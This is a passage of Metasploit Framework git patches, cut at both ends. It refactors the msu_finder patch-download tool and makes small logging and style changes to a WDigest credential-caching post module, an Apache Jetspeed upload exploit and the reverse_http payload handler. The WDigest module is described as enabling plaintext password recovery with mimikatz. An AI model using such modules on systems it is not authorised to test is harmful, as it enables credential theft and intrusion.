be_kind_of(Fixnum) - end - end - - end - - describe MicrosoftPatchFinder::Driver do - - let(:msb) do - 'ms15-100' - end - - let(:expected_link) do - 'http://download.microsoft.com/download/9/0/6/906BC7A4-7DF7-4C24-9F9D-3E801AA36ED3/Windows6.0-KB3087918-x86.msu' - end - - before(:example) do - opts = { keyword: msb } - allow(MicrosoftPatchFinder::OptsConsole).to receive(:get_parsed_options).and_return(opts) - allow_any_instance_of(MicrosoftPatchFinder::PatchLinkCollector).to receive(:download_advisory).and_return(Rex::Proto::Http::Response.new) - allow_any_instance_of(MicrosoftPatchFinder::PatchLinkCollector).to receive(:get_details_aspx).and_return([expected_link]) - allow_any_instance_of(MicrosoftPatchFinder::PatchLinkCollector).to receive(:get_download_page).and_return(Rex::Proto::Http::Response.new) - allow_any_instance_of(MicrosoftPatchFinder::PatchLinkCollector).to receive(:get_download_links).and_return([expected_link]) - allow_any_instance_of(MicrosoftPatchFinder::Driver).to receive(:print_debug) - allow_any_instance_of(MicrosoftPatchFinder::Driver).to receive(:print_error) - allow_any_instance_of(MicrosoftPatchFinder::PatchLinkCollector).to receive(:print_debug) - allow_any_instance_of(MicrosoftPatchFinder::PatchLinkCollector).to receive(:print_error) - end - - subject(:driver) do - MicrosoftPatchFinder::Driver.new - end - - describe '#get_download_links' do - it 'returns an array of links' do - results = driver.get_download_links(msb) - expect(results).to be_kind_of(Array) - expect(results.first).to eq(expected_link) - end - end - - describe '#google_search' do - it 'returns search results' do - skip('See rspec for MicrosoftPatchFinder::GoogleMsbSearch#find_msb_numbers') - end - end - - describe '#technet_search' do - it 'returns search results' do - skip('See rspec for MicrosoftPatchFinder::TechnetMsbSearch#find_msb_numbers') - end - end - - end - -end diff --git a/tools/exploit/msu_finder.rb b/tools/exploit/msu_finder.rb index 083026c1a5..5203a5b167 100755 --- a/tools/exploit/msu_finder.rb +++ b/tools/exploit/msu_finder.rb @@ -1,771 +1,108 @@ #!/usr/bin/env ruby -### -# -# This script will enumerate download links for Microsoft patches. -# -# Author: -# * sinn3r -# -### - - -msfbase = __FILE__ -while File.symlink?(msfbase) - msfbase = File.expand_path(File.readlink(msfbase), File.dirname(msfbase)) -end -$:.unshift(File.expand_path(File.join(File.dirname(msfbase), '..', '..', 'lib'))) -require 'rex' -require 'nokogiri' -require 'uri' -require 'json' +require 'patch_finder/core/helper' +require 'patch_finder/msu' require 'optparse' -module MicrosoftPatchFinder +class PatchFinderBin - module SiteInfo - TECHNET = { - ip: '157.56.148.23', - vhost: 'technet.microsoft.com' - } + include PatchFinder::Helper - MICROSOFT = { - ip: '104.72.230.162', - vhost: 'www.microsoft.com' - } + attr_reader :args - GOOGLEAPIS = { - ip: '74.125.28.95', - vhost: 'www.googleapis.com' - } - end + def get_parsed_options + options = {} - # This provides whatever other classes need. - module Helper + parser = OptionParser.new do |opt| + opt.separator '' + opt.separator 'Specific options:' - # Prints a debug message. - # - # @param msg [String] The message to print. - # @return [void] - def print_debug(msg='') - $stderr.puts "[DEBUG] #{msg}" - end + opt.on('-q', '--query ', 'Find advisories including this keyword') do |v| + options[:keyword] = v + end - # Prints a status message. - # - # @param msg [String] The message to print. - # @return [void] - def print_status(msg='') - $stderr.puts "[*] #{msg}" - end - - # Prints an error message. - # - # @param msg [String] The message to print. - # @return [void] - def print_error(msg='') - $stderr.puts "[ERROR] #{msg}" - end - - # Prints a regular message. - # - # @param msg [String] The message to print. - # @return pvoid - def print_line(msg='') - $stdout.puts msg - end - - # Sends an HTTP request with Rex. - # - # @param rhost [Hash] Information about the target host. Use MicrosoftPatchFinder::SiteInfo. - # @option rhost [String] :vhost - # @option rhost [String] :ip IPv4 address - # @param opts [Hash] Information about the Rex request. - # @raise [RuntimeError] Failure to make a request. - # @return [Rex::Proto::Http::Response] - def send_http_request(rhost, opts={}) - res = nil - - opts.merge!({'vhost'=>rhost[:vhost]}) - - print_debug("Requesting: #{opts['uri']}") - - cli = Rex::Proto::Http::Client.new(rhost[:ip], 443, {}, true, 'TLS1') - tries = 1 - begin - cli.connect - req = cli.request_cgi(opts) - res = cli.send_recv(req) - rescue ::EOFError, Errno::ETIMEDOUT ,Errno::ECONNRESET, Rex::ConnectionError, OpenSSL::SSL::SSLError, ::Timeout::Error => e - if tries < 3 - print_error("Failed to make a request, but will try again in 5 seconds...") - sleep(5) - tries += 1 - retry + opt.on('-s', '--search-engine ', '(Optional) The type of search engine to use (Technet or Google). Default: Technet') do |v| + case v.to_s + when /^google$/i + options[:search_engine] = :google + when /^technet$/i + options[:search_engine] = :technet else - raise "[x] Unable to make a request: #{e.class} #{e.message}\n#{e.backtrace * "\n"}" - end - ensure - cli.close - end - - res - end - end - - - # Collects MSU download links from Technet. - class PatchLinkCollector - include MicrosoftPatchFinder::Helper - - # Returns a response of an advisory page. - # - # @param msb [String] MSB number in this format: msxx-xxx - # @return [Rex::Proto::Http::Response] - def download_advisory(msb) - send_http_request(SiteInfo::TECHNET, { - 'uri' => "/en-us/library/security/#{msb}.aspx" - }) - end - - - # Returns the most appropriate pattern that could be used to parse and extract links from an advisory. - # - # @param n [Nokogiri::HTML::Document] The advisory page parsed by Nokogiri - # @return [Hash] - def get_appropriate_pattern(n) - # These pattern checks need to be in this order. - patterns = [ - # This works from MS14-001 until the most recent - { - check: '//div[@id="mainBody"]//div//h2//div//span[contains(text(), "Affected Software")]', - pattern: '//div[@id="mainBody"]//div//div[@class="sectionblock"]//table//a' - }, - # This works from ms03-040 until MS07-029 - { - check: '//div[@id="mainBody"]//ul//li//a[contains(text(), "Download the update")]', - pattern: '//div[@id="mainBody"]//ul//li//a[contains(text(), "Download the update")]' - }, - # This works from sometime until ms03-039 - { - check: '//div[@id="mainBody"]//div//div[@class="sectionblock"]//p//strong[contains(text(), "Download locations")]', - pattern: '//div[@id="mainBody"]//div//div[@class="sectionblock"]//ul//li//a' - }, - # This works from MS07-030 until MS13-106 (the last update in 2013) - # The check is pretty short so if it kicks in too early, it tends to create false positives. - # So it goes last. - { - check: '//div[@id="mainBody"]//p//strong[contains(text(), "Affected Software")]', - pattern: '//div[@id="mainBody"]//table//a' - }, - ] - - patterns.each do |pattern| - if n.at_xpath(pattern[:check]) - return pattern[:pattern] + fail OptionParser::InvalidOption, "Invalid search engine: #{v}" end end - nil - end - - - # Returns the details page for an advisory. - # - # @param res [Rex::Proto::Http::Response] - # @return [Array] An array of URI objects. - def get_details_aspx(res) - links = [] - - page = res.body - n = ::Nokogiri::HTML(page) - - appropriate_pattern = get_appropriate_pattern(n) - - n.search(appropriate_pattern).each do |anchor| - found_link = anchor.attributes['href'].value - if /https:\/\/www\.microsoft\.com\/downloads\/details\.aspx\?familyid=/i === found_link - begin - links << URI(found_link) - rescue ::URI::InvalidURIError - print_error "Unable to parse URI: #{found_link}" - end - end + opt.on('-r', '--regex ', '(Optional) Specify what type of links you want') do |v| + options[:regex] = v end - links - end - - - # Returns the redirected page. - # - # @param rhost [Hash] From MicrosoftPatchFinder::SiteInfo - # @param res [Rex::Proto::Http::Response] - # @return [Rex::Proto::Http::Response] - def follow_redirect(rhost, res) - opts = { - 'method' => 'GET', - 'uri' => res.headers['Location'] - } - - send_http_request(rhost, opts) - end - - - # Returns the download page of an advisory. - # - # @param uri [URI::HTTP] - # @return [Rex::Proto::Http::Response] - def get_download_page(uri) - opts = { - 'method' => 'GET', - 'uri' => uri.request_uri - } - - res = send_http_request(SiteInfo::MICROSOFT, opts) - - if res.headers['Location'] - return follow_redirect(SiteInfo::MICROSOFT, res) + opt.on('--apikey ', '(Optional) Google API key.') do |v| + options[:google_api_key] = v end - res - end - - - # Returns a collection of found MSU download links from an advisory. - # - # @param page [String] The HTML page of the advisory. - # @return [Array] An array of links - def get_download_links(page) - page = ::Nokogiri::HTML(page) - - relative_uri = page.search('a').select { |a| - a.attributes['href'] && a.attributes['href'].value.include?('confirmation.aspx?id=') - }.first - - return [] unless relative_uri - relative_uri = relative_uri.attributes['href'].value - - absolute_uri = URI("https://www.microsoft.com/en-us/download/#{relative_uri}") - opts = { - 'method' => 'GET', - 'uri' => absolute_uri.request_uri - } - res = send_http_request(SiteInfo::MICROSOFT, opts) - n = ::Nokogiri::HTML(res.body) - - n.search('a').select { |a| - a.attributes['href'] && a.attributes['href'].value.include?('https://download.microsoft.com/download/') - }.map! { |a| a.attributes['href'].value }.uniq - end - - - # Returns whether the page is an advisory or not. - # - # @param res [Rex::Proto::Http::Response] - # @return [Boolean] true if the page is an advisory, otherwise false. - def has_advisory?(res) - !res.body.include?('We are sorry. The page you requested cannot be found') - end - - - # Returns whether the number is in valid MSB format or not. - # - # @param msb [String] The number to check. - # @return [Boolean] true if the number is in MSB format, otherwise false. - def is_valid_msb?(msb) - /^ms\d\d\-\d\d\d$/i === msb - end - end - - - # A class that searches advisories from Technet. - class TechnetMsbSearch - include MicrosoftPatchFinder::Helper - - def initialize - opts = { - 'method' => 'GET', - 'uri' => '/en-us/security/bulletin/dn602597.aspx' - } - res = send_http_request(SiteInfo::TECHNET, opts) - @firstpage ||= res.body - end - - - # Returns a collection of found MSB numbers either from the product list, or generic search. - # - # @param keyword [String] The product to look for. - # @return [Array] - def find_msb_numbers(keyword) - product_list_matches = get_product_dropdown_list.select { |p| Regexp.new(keyword) === p[:option_text] } - if product_list_matches.empty? - print_debug("Did not find a match from the product list, attempting a generic search") - search_by_keyword(keyword) - else - product_names = [] - ids = [] - product_list_matches.each do |e| - ids << e[:option_value] - product_names << e[:option_text] - end - print_debug("Matches from the product list (#{product_names.length}): #{ product_names * ', ' }") - search_by_product_ids(ids) - end - end - - - # Returns the search results in JSON format. - # - # @param keyword [String] The keyword to search. - # @return [Hash] JSON data. - def search(keyword) - opts = { - 'method' => 'GET', - 'uri' => '/security/bulletin/services/GetBulletins', - 'vars_get' => { - 'searchText' => keyword, - 'sortField' => '0', - 'sortOrder' => '1', - 'currentPage' => '1', - 'bulletinsPerPage' => '9999', - 'locale' => 'en-us' - } - } - res = send_http_request(SiteInfo::TECHNET, opts) - begin - return JSON.parse(res.body) - rescue JSON::ParserError + opt.on('--cx ', '(Optional) Google search engine ID.') do |v| + options[:google_search_engine_id] = v end - {} - end + opt.on('-d', '--dir ', '(Optional) The directory to save the patches') do |v| + unless File.directory?(v) + fail OptionParser::InvalidOption, "Directory not found: #{v}" + end - - # Performs a search based on product IDs - # - # @param ids [Array] An array of product IDs. - # @return [Array] An array of found MSB numbers. - def search_by_product_ids(ids) - msb_numbers = [] - - ids.each do |id| - j = search(id) - msb = j['b'].collect { |e| e['Id']}.map{ |e| e.downcase} - msb_numbers.concat(msb) + options[:destdir] = v end - msb_numbers - end - - - # Performs a search based on a keyword - # - # @param keyword [String] - # @return [Array] An array of found MSB numbers - def search_by_keyword(keyword) - j = search(keyword) - j['b'].collect { |e| e['Id']}.map{ |e| e.downcase } - end - - - # Returns the product list that Technet currently supports for searching. - # - # @return [Array] - def get_product_dropdown_list - @product_dropdown_list ||= lambda { - list = [] - - page = ::Nokogiri::HTML(firstpage) - page.search('//div[@class="sb-search"]//select[@id="productDropdown"]//option').each do |product| - option_value = product.attributes['value'].value - option_text = product.text - next if option_value == '-1' # This is the ALL option - list << { option_value: option_value, option_text: option_text } - end - - list - }.call - end - - attr_reader :firstpage - end - - class GoogleMsbSearch - include MicrosoftPatchFinder::Helper - - # API Doc: - # https://developers.google.com/custom-search/json-api/v1/using_rest - # Known bug: - # * Always gets 20 MSB results. Weird. - - def initialize(opts={}) - @api_key = opts[:api_key] - @search_engine_id = opts[:search_engine_id] - end - - - # Returns the MSB numbers associated with the keyword. - # - # @param keyword [String] The keyword to search for in an advisory. - # @return [Array] MSB numbers - def find_msb_numbers(keyword) - msb_numbers = [] - next_starting_index = 1 - - begin - while - results = search(keyword: keyword, starting_index: next_starting_index) - items = results['items'] - items.each do |item| - title = item['title'] - msb = title.scan(/Microsoft Security Bulletin (MS\d\d\-\d\d\d)/).flatten.first - if msb - msb_numbers << msb.downcase - end - end - - next_starting_index = get_next_index(results) - next_page = results['queries']['nextPage'] - - # Google API Documentation: - # https://developers.google.com/custom-search/json-api/v1/using_rest - # "This role is not present if the current results are the last page. - # Note: This API returns up to the first 100 results only." - break if next_page.nil? || next_starting_index > 100 - end - rescue RuntimeError => e - print_error(e.message) - return msb_numbers.uniq - end - - msb_numbers.uniq - end - - - # Performs a search using Google API - # - # @param opts [Hash] - # @options opts [String] :keyword The keyword to search - # @return [Hash] JSON data - def search(opts={}) - starting_index = opts[:starting_index] - - search_string = [ - opts[:keyword], - 'intitle:"Microsoft Security Bulletin"', - '-"Microsoft Security Bulletin Summary"' - ].join(' ') - - opts = { - 'method' => 'GET', - 'uri' => '/customsearch/v1', - 'vars_get' => { - 'key' => api_key, - 'cx' => search_engine_id, - 'q' => search_string, - 'start' => starting_index.to_s, - 'num' => '10', # 10 is max - 'c2coff' => '1' # 1 = Disabled, 0 = Enabled - } - } - - res = send_http_request(SiteInfo::GOOGLEAPIS, opts) - results = parse_results(res) - if starting_index == 1 - print_debug("Number of search results: #{get_total_results(results)}") - end - - results - end - - - # Parse Google API search results - # - # @param res [Rex::Proto::Http::Response] - # @raise [RuntimeError] If Google returns an error - # @return [Hash] - def parse_results(res) - j = JSON.parse(res.body) - - if j['error'] - message = j['error']['errors'].first['message'] - reason = j['error']['errors'].first['reason'] - raise "Google Search failed. #{message} (#{reason})" - end - - j - end - - - # Returns the total results. - # - # @param j [Hash] JSON data from Google. - # @return [Fixnum] - def get_total_results(j) - j['queries']['request'].first['totalResults'].to_i - end - - - # Returns the next index. - # - # @param j [Hash] JSON data from Google. - # @return [Fixnum] - def get_next_index(j) - j['queries']['nextPage'] ? j['queries']['nextPage'].first['startIndex'] : 0 - end - - # @!attribute api_key - # @return [String] The Google API key - attr_reader :api_key - - # @!attribute search_engine_id - # @return [String] The Google Custom Search Engine ID - attr_reader :search_engine_id - end - - class OptsConsole - def self.banner - %Q| - Usage: #{__FILE__} [options] - - The following example will download all IE update links: - #{__FILE__} -q "Internet Explorer" - - Searching advisories via Technet: - When you submit a query, the Technet search engine will first look it up from a product list, - and then return all the advisories that include the keyword you are looking for. If there's - no match from the product list, then the script will try a generic search. The generic method - also means you can search by MSB, KB, or even the CVE number. - - Searching advisories via Google: - Searching via Google requires an API key and an Search Engine ID from Google. To obtain these, - make sure you have a Google account (such as Gmail), and then do the following: - 1. Go to Google Developer's Console - 1. Enable Custom Search API - 2. Create a browser type credential. The credential is the API key. - 2. Go to Custom Search - 1. Create a new search engine - 2. Under Sites to Search, set: technet.microsoft.com - 3. In your search site, get the Search Engine ID under the Basics tab. - By default, Google has a quota limit of 1000 queries per day. You can raise this limit with - a fee. - - The way this tool uses Google to find advisories is the same as doing the following manually: - [Query] site:technet.microsoft.com intitle:"Microsoft Security Bulletin" -"Microsoft Security Bulletin Summary" - - Dryrun: - If you'd like to double check on false positives, you can use the -d flag and manually verify - the accuracy of the search results before actually collecting the download links. - - Download: - The following trick demonstrates how you can automatically download the updates: - ruby #{__FILE__} -q "ms15-100" -r x86 > /tmp/list.txt && wget -i /tmp/list.txt - - Patch Extraction: - After downloading the patch, you can use the extract_msu.bat tool to automatically extract - Microsoft patches. - | - end - - def self.get_parsed_options - options = {} - - parser = OptionParser.new do |opt| - opt.banner = banner.strip.gsub(/^[[:blank:]]{4}/, '') - opt.separator '' - opt.separator 'Specific options:' - - opt.on('-q', '--query ', 'Find advisories that include this keyword') do |v| - options[:keyword] = v - end - - opt.on('-s', '--search-engine ', '(Optional) The type of search engine to use (Technet or Google). Default: Technet') do |v| - case v.to_s - when /^google$/i - options[:search_engine] = :google - when /^technet$/i - options[:search_engine] = :technet - else - raise OptionParser::MissingArgument, "Invalid search engine: #{v}" - end - end - - opt.on('-r', '--regex ', '(Optional) Specify what type of links you want') do |v| - options[:regex] = v - end - - opt.on('--apikey ', '(Optional) Google API key. Set this if the search engine is Google') do |v| - options[:google_api_key] = v - end - - opt.on('--cx ', '(Optional) Google search engine ID. Set this if the search engine is Google') do |v| - options[:google_search_engine_id] = v - end - - opt.on('-d', '--dryrun', '(Optional) Perform a search, but do not fetch download links. Default: no') do |v| - options[:dryrun] = true - end - - opt.on_tail('-h', '--help', 'Show this message') do - $stderr.puts opt - exit - end - end - - parser.parse! - - if options.empty? - raise OptionParser::MissingArgument, 'No options set, try -h for usage' - elsif options[:keyword].nil? || options[:keyword].empty? - raise OptionParser::MissingArgument, '-q is required' - end - - unless options[:search_engine] - options[:search_engine] = :technet - end - - if options[:search_engine] == :google - if options[:google_api_key].nil? || options[:google_search_engine_id].empty? - raise OptionParser::MissingArgument, 'Search engine is Google, but no API key specified' - elsif options[:google_search_engine_id].nil? || options[:google_search_engine_id].empty? - raise OptionParser::MissingArgument, 'Search engine is Google, but no search engine ID specified' - end - end - - options - end - end - - class Driver - include MicrosoftPatchFinder::Helper - - def initialize - begin - @args = MicrosoftPatchFinder::OptsConsole.get_parsed_options - rescue OptionParser::InvalidOption, OptionParser::MissingArgument => e - print_error(e.message) + opt.on_tail('-h', '--help', 'Show this message') do + $stderr.puts opt exit end end - # Returns download links. - # - # @param msb [String] MSB number. - # @param regex [String] The regex pattern to use to collect specific download URLs. - # @return [Array] Download links - def get_download_links(msb, regex=nil) - msft = MicrosoftPatchFinder::PatchLinkCollector.new + parser.parse! - unless msft.is_valid_msb?(msb) - print_error "Not a valid MSB format." - print_error "Example of a correct one: ms15-100" - return [] - end - - res = msft.download_advisory(msb) - - if !msft.has_advisory?(res) - print_error "The advisory cannot be found" - return [] - end - - links = msft.get_details_aspx(res) - if links.length == 0 - print_error "Unable to find download.microsoft.com links. Please manually navigate to the page." - return [] - else - print_debug("Found #{links.length} affected products for this advisory.") - end - - link_collector = [] - - links.each do |link| - download_page = msft.get_download_page(link) - download_links = msft.get_download_links(download_page.body) - if regex - filtered_links = download_links.select { |l| Regexp.new(regex) === l } - link_collector.concat(filtered_links) - else - link_collector.concat(download_links) - end - end - - link_collector + if options.empty? + fail OptionParser::MissingArgument, 'No options set, try -h for usage' + elsif options[:keyword].nil? || options[:keyword].empty? + fail OptionParser::MissingArgument, '-q is required' end - # Performs a search via Google - # - # @param keyword [String] The keyword to search - # @param api_key [String] Google API key - # @param cx [String] Google Search Engine Key - # @return [Array] See MicrosoftPatchFinder::GoogleMsbSearch#find_msb_numbers - def google_search(keyword, api_key, cx) - search = MicrosoftPatchFinder::GoogleMsbSearch.new(api_key: api_key, search_engine_id: cx) - search.find_msb_numbers(keyword) + unless options[:search_engine] + options[:search_engine] = :technet end - - # Performs a search via Technet - # - # @param keyword [String] The keyword to search - # @return [Array] See MicrosoftPatchFinder::TechnetMsbSearch#find_msb_numbers - def technet_search(keyword) - search = MicrosoftPatchFinder::TechnetMsbSearch.new - search.find_msb_numbers(keyword) - end - - def run - links = [] - msb_numbers = [] - keyword = args[:keyword] - regex = args[:regex] ? args[:regex] : nil - api_key = args[:google_api_key] - cx = args[:google_search_engine_id] - - case args[:search_engine] - when :technet - print_debug("Searching advisories that include #{keyword} via Technet") - msb_numbers = technet_search(keyword) - when :google - print_debug("Searching advisories that include #{keyword} via Google") - msb_numbers = google_search(keyword, api_key, cx) - end - - print_debug("Advisories found (#{msb_numbers.length}): #{msb_numbers * ', '}") unless msb_numbers.empty? - - return if args[:dryrun] - - msb_numbers.each do |msb| - print_debug("Finding download links for #{msb}") - links.concat(get_download_links(msb, regex)) - end - - unless links.empty? - print_status "Found these links:" - print_line links * "\n" - print_status "Total downloadable updates found: #{links.length}" + if options[:search_engine] == :google + if options[:google_api_key].nil? || options[:google_search_engine_id].empty? + fail OptionParser::MissingArgument, 'No API key set for Google' + elsif options[:google_search_engine_id].nil? || options[:google_search_engine_id].empty? + fail OptionParser::MissingArgument, 'No search engine ID set for Google' end end - attr_reader :args + options + end + + def initialize + @args = get_parsed_options + rescue OptionParser::InvalidOption, OptionParser::MissingArgument => e + print_error(e.message) + exit + end + + def main + cli = PatchFinder::MSU.new(verbose: true) + links = cli.find_msu_download_links(args) + if args[:destdir] + print_status("Download links found: #{links.length}") + print_status('Downloading files, please wait...') + download_files(links, args[:destdir]) + else + print_status('Download links found:') + print_line(links * "\n") + end end end - if __FILE__ == $PROGRAM_NAME - mod = MicrosoftPatchFinder::Driver.new - begin - mod.run - rescue Interrupt - $stdout.puts - $stdout.puts "Good bye" - end + bin = PatchFinderBin.new + bin.main end - -=begin -TODO: - * Make a gem - * Make it generic in order to manage different kind of patches and providers - * Multithreading -=end From 9e45f0c104a31a8ac730a0265fe7ae7512a1d71a Mon Sep 17 00:00:00 2001 From: Meatballs Date: Wed, 30 Mar 2016 15:29:03 +0100 Subject: [PATCH 631/686] Minor tidies --- modules/post/windows/manage/wdigest_caching.rb | 5 +---- 1 file changed, 1 insertion(+), 4 deletions(-) diff --git a/modules/post/windows/manage/wdigest_caching.rb b/modules/post/windows/manage/wdigest_caching.rb index 764f37ffca..8b18191521 100644 --- a/modules/post/windows/manage/wdigest_caching.rb +++ b/modules/post/windows/manage/wdigest_caching.rb @@ -3,10 +3,7 @@ require 'rex' require 'msf/core/auxiliary/report' class Metasploit3 < Msf::Post - include Msf::Post::Windows::Priv include Msf::Post::Windows::Registry - include Msf::Post::Windows::Accounts - include Msf::Auxiliary::Report WDIGEST_REG_LOCATION = 'HKLM\\SYSTEM\\CurrentControlSet\\Control\\SecurityProviders\\WDigest' USE_LOGON_CREDENTIAL = 'UseLogonCredential' @@ -16,7 +13,7 @@ class Metasploit3 < Msf::Post 'Name' => 'Windows Post Manage WDigest Credential Caching', 'Description' => %q{ On Windows 8/2012 or higher, the Digest Security Provider (WDIGEST) is disabled by default. This module enables/disables - credential caching by adding/changing the value of the UseLogonCredential DWORD under WDIGEST provider's Registry key. + credential caching by adding/changing the value of the UseLogonCredential DWORD under the WDIGEST provider's Registry key. Any subsequest logins will allow mimikatz to recover the plain text passwords from the system's memory. }, 'License' => MSF_LICENSE, From 397d5580be0e44ea5bb1ecd8c0979ab1a7d7c862 Mon Sep 17 00:00:00 2001 From: Meatballs Date: Wed, 30 Mar 2016 15:44:37 +0100 Subject: [PATCH 632/686] Use MetasploitModule convention --- modules/post/windows/manage/wdigest_caching.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/modules/post/windows/manage/wdigest_caching.rb b/modules/post/windows/manage/wdigest_caching.rb index 8b18191521..f792e2e9b0 100644 --- a/modules/post/windows/manage/wdigest_caching.rb +++ b/modules/post/windows/manage/wdigest_caching.rb @@ -2,7 +2,7 @@ require 'msf/core' require 'rex' require 'msf/core/auxiliary/report' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post include Msf::Post::Windows::Registry WDIGEST_REG_LOCATION = 'HKLM\\SYSTEM\\CurrentControlSet\\Control\\SecurityProviders\\WDigest' From 74f25f04bd2af0f5323d55a1be3de8be5ea2b225 Mon Sep 17 00:00:00 2001 From: wchen-r7 Date: Wed, 30 Mar 2016 11:16:41 -0500 Subject: [PATCH 633/686] Make sure to always print the target IP:Port --- .../exploits/multi/http/apache_jetspeed_file_upload.rb | 8 ++++++++ 1 file changed, 8 insertions(+) diff --git a/modules/exploits/multi/http/apache_jetspeed_file_upload.rb b/modules/exploits/multi/http/apache_jetspeed_file_upload.rb index 7079620ed4..7f6f27ded4 100644 --- a/modules/exploits/multi/http/apache_jetspeed_file_upload.rb +++ b/modules/exploits/multi/http/apache_jetspeed_file_upload.rb @@ -52,6 +52,14 @@ class MetasploitModule < Msf::Exploit::Remote ]) end + def print_status(msg='') + super("#{peer} - #{msg}") + end + + def print_warning(msg='') + super("#{peer} - #{msg}") + end + def exploit print_status("Creating admin user: #{username}:#{password}") create_admin_user From 0a239742f5fd9bec4bdb166ce7005dc27ceb5c8f Mon Sep 17 00:00:00 2001 From: James Lee Date: Wed, 30 Mar 2016 11:35:04 -0500 Subject: [PATCH 634/686] Show handler URI so we know which job's responding --- lib/msf/core/handler/reverse_http.rb | 18 +++++++++--------- 1 file changed, 9 insertions(+), 9 deletions(-) diff --git a/lib/msf/core/handler/reverse_http.rb b/lib/msf/core/handler/reverse_http.rb index e4fe6a4c6e..8c403e428c 100644 --- a/lib/msf/core/handler/reverse_http.rb +++ b/lib/msf/core/handler/reverse_http.rb @@ -66,7 +66,7 @@ module ReverseHttp # Return a URI suitable for placing in a payload # # @return [String] A URI of the form +scheme://host:port/+ - def listener_uri(addr) + def listener_uri(addr=datastore['LHOST']) uri_host = Rex::Socket.is_ipv6?(addr) ? "[#{addr}]" : addr "#{scheme}://#{uri_host}:#{bind_port}/" end @@ -241,7 +241,7 @@ protected # Validate known UUIDs for all requests if IgnoreUnknownPayloads is set if datastore['IgnoreUnknownPayloads'] && ! framework.uuid_db[uuid.puid_hex] - print_status("#{cli.peerhost}:#{cli.peerport} (UUID: #{uuid.to_s}) Ignoring unknown UUID: #{request_summary}") + print_status("#{listener_uri} handling request from #{cli.peerhost}; (UUID: #{uuid.to_s}) Ignoring unknown UUID: #{request_summary}") info[:mode] = :unknown_uuid end @@ -249,7 +249,7 @@ protected if datastore['IgnoreUnknownPayloads'] && info[:mode].to_s =~ /^init_/ allowed_urls = framework.uuid_db[uuid.puid_hex]['urls'] || [] unless allowed_urls.include?(req.relative_resource) - print_status("#{cli.peerhost}:#{cli.peerport} (UUID: #{uuid.to_s}) Ignoring unknown UUID URL: #{request_summary}") + print_status("#{listener_uri} handling request from #{cli.peerhost}; (UUID: #{uuid.to_s}) Ignoring unknown UUID URL: #{request_summary}") info[:mode] = :unknown_uuid_url end end @@ -259,7 +259,7 @@ protected # Process the requested resource. case info[:mode] when :init_connect - print_status("#{cli.peerhost}:#{cli.peerport} (UUID: #{uuid.to_s}) Redirecting stageless connection from #{request_summary}") + print_status("#{listener_uri} handling request from #{cli.peerhost}; (UUID: #{uuid.to_s}) Redirecting stageless connection from #{request_summary}") # Handle the case where stageless payloads call in on the same URI when they # first connect. From there, we tell them to callback on a connect URI that @@ -272,7 +272,7 @@ protected resp.body = pkt.to_r when :init_python - print_status("#{cli.peerhost}:#{cli.peerport} (UUID: #{uuid.to_s}) Staging Python payload ...") + print_status("#{listener_uri} handling request from #{cli.peerhost}; (UUID: #{uuid.to_s}) Staging Python payload ...") url = payload_uri(req) + conn_id + '/' blob = "" @@ -301,7 +301,7 @@ protected }) when :init_java - print_status("#{cli.peerhost}:#{cli.peerport} (UUID: #{uuid.to_s}) Staging Java payload ...") + print_status("#{listener_uri} handling request from #{cli.peerhost}; (UUID: #{uuid.to_s}) Staging Java payload ...") url = payload_uri(req) + conn_id + "/\x00" blob = obj.generate_stage( @@ -325,7 +325,7 @@ protected }) when :init_native - print_status("#{cli.peerhost}:#{cli.peerport} (UUID: #{uuid.to_s}) Staging Native payload ...") + print_status("#{listener_uri} handling request from #{cli.peerhost}; (UUID: #{uuid.to_s}) Staging Native payload ...") url = payload_uri(req) + conn_id + "/\x00" uri = URI(payload_uri(req) + conn_id) @@ -356,7 +356,7 @@ protected }) when :connect - print_status("#{cli.peerhost}:#{cli.peerport} (UUID: #{uuid.to_s}) Attaching orphaned/stageless session ...") + print_status("#{listener_uri} handling request from #{cli.peerhost}; (UUID: #{uuid.to_s}) Attaching orphaned/stageless session ...") resp.body = '' conn_id = req.relative_resource @@ -376,7 +376,7 @@ protected else unless [:unknown_uuid, :unknown_uuid_url].include?(info[:mode]) - print_status("#{cli.peerhost}:#{cli.peerport} Unknown request to #{request_summary}") + print_status("#{listener_uri} handling request from #{cli.peerhost}; Unknown request to #{request_summary}") end resp.code = 200 resp.message = 'OK' From ead6e6b6b69d7f5a2b311a2a4889730a61bd2362 Mon Sep 17 00:00:00 2001 From: James Lee Date: Wed, 30 Mar 2016 11:50:45 -0500 Subject: [PATCH 635/686] Use a print_prefix instead --- lib/msf/core/handler/reverse_http.rb | 25 +++++++++++++++++-------- 1 file changed, 17 insertions(+), 8 deletions(-) diff --git a/lib/msf/core/handler/reverse_http.rb b/lib/msf/core/handler/reverse_http.rb index 8c403e428c..5975ac9781 100644 --- a/lib/msf/core/handler/reverse_http.rb +++ b/lib/msf/core/handler/reverse_http.rb @@ -63,6 +63,14 @@ module ReverseHttp ], Msf::Handler::ReverseHttp) end + def print_prefix + if Thread.current[:cli] + super + "#{listener_uri} handling request from #{Thread.current[:cli].peerhost}; (UUID: #{uuid.to_s}) " + else + super + end + end + # Return a URI suitable for placing in a payload # # @return [String] A URI of the form +scheme://host:port/+ @@ -224,6 +232,7 @@ protected # Parses the HTTPS request # def on_request(cli, req, obj) + Thread.current[:cli] = cli resp = Rex::Proto::Http::Response.new info = process_uri_resource(req.relative_resource) uuid = info[:uuid] || Msf::Payload::UUID.new @@ -241,7 +250,7 @@ protected # Validate known UUIDs for all requests if IgnoreUnknownPayloads is set if datastore['IgnoreUnknownPayloads'] && ! framework.uuid_db[uuid.puid_hex] - print_status("#{listener_uri} handling request from #{cli.peerhost}; (UUID: #{uuid.to_s}) Ignoring unknown UUID: #{request_summary}") + print_status("Ignoring unknown UUID: #{request_summary}") info[:mode] = :unknown_uuid end @@ -249,7 +258,7 @@ protected if datastore['IgnoreUnknownPayloads'] && info[:mode].to_s =~ /^init_/ allowed_urls = framework.uuid_db[uuid.puid_hex]['urls'] || [] unless allowed_urls.include?(req.relative_resource) - print_status("#{listener_uri} handling request from #{cli.peerhost}; (UUID: #{uuid.to_s}) Ignoring unknown UUID URL: #{request_summary}") + print_status("Ignoring unknown UUID URL: #{request_summary}") info[:mode] = :unknown_uuid_url end end @@ -259,7 +268,7 @@ protected # Process the requested resource. case info[:mode] when :init_connect - print_status("#{listener_uri} handling request from #{cli.peerhost}; (UUID: #{uuid.to_s}) Redirecting stageless connection from #{request_summary}") + print_status("Redirecting stageless connection from #{request_summary}") # Handle the case 